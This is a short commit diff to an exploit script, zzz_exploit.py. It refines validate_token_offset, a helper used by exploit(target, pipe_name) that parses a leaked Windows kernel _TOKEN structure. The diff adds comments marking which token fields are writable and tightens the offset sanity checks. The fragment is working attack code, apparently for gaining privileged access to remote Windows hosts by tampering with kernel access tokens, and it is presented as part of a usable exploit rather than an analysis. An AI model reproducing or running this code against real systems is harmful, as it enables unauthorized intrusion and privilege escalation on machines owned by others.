added additional 0 checks and struct notes

zzz_exploit.py

@@ -908,18 +908,29 @@ def exploit(target, pipe_name):
 	return True
 
 def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset):
+	# struct _TOKEN:
+	#	...
+	#	ULONG UserAndGroupCount;                            // Ro: 4-Bytes
+	#	ULONG RestrictedSidCount;                           // Ro: 4-Bytes
+	# 	...
+	#	PSID_AND_ATTRIBUTES UserAndGroups;                  // Wr: sizeof(void*)
+	#	PSID_AND_ATTRIBUTES RestrictedSids;                 // Ro: sizeof(void*)
+	#	...
 
-	RestrictedSidCount = unpack_from('<I', tokenData, userAndGroupCountOffset + 4)[0]  				# + sizeof(ULONG) (always 4)
-	RestrictedSids = unpack_from('<'+info['PTR_FMT'], tokenData, userAndGroupsAddrOffset + info['PTR_SIZE'])[0] 	# + sizeof(void*) (4 or 8)
+	userAndGroupCount, RestrictedSidCount = unpack_from('<II', tokenData, userAndGroupCountOffset) 
+	userAndGroupsAddr, RestrictedSids = unpack_from('<'+info['PTR_FMT']*2, tokenData, userAndGroupsAddrOffset)
 
-	userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
-	userAndGroupsAddr = unpack_from('<'+info['PTR_FMT'], tokenData, userAndGroupsAddrOffset)[0]
+	# RestrictedSidCount 	MUST be 0
+	# RestrictedSids 	MUST be NULL
+	#
+	# userandGroupCount 	must NOT be 0
+	# userandGroupAddr 	must NOT be NULL
+	#
+	# Could also add a failure point here if userAndGroupCount >= x
 
 	success = True
 
-	# RestrictedSids and RestrictedSidCount MUST be 0
-	# Could also add a failure point here if userAndGroupCount >= x
-	if RestrictedSids != 0 or RestrictedSidCount != 0:
+	if RestrictedSidCount != 0 or RestrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0:
 		print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!')
 		print('RestrictedSids: 0x{:x}'.format(RestrictedSids))
 		print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount))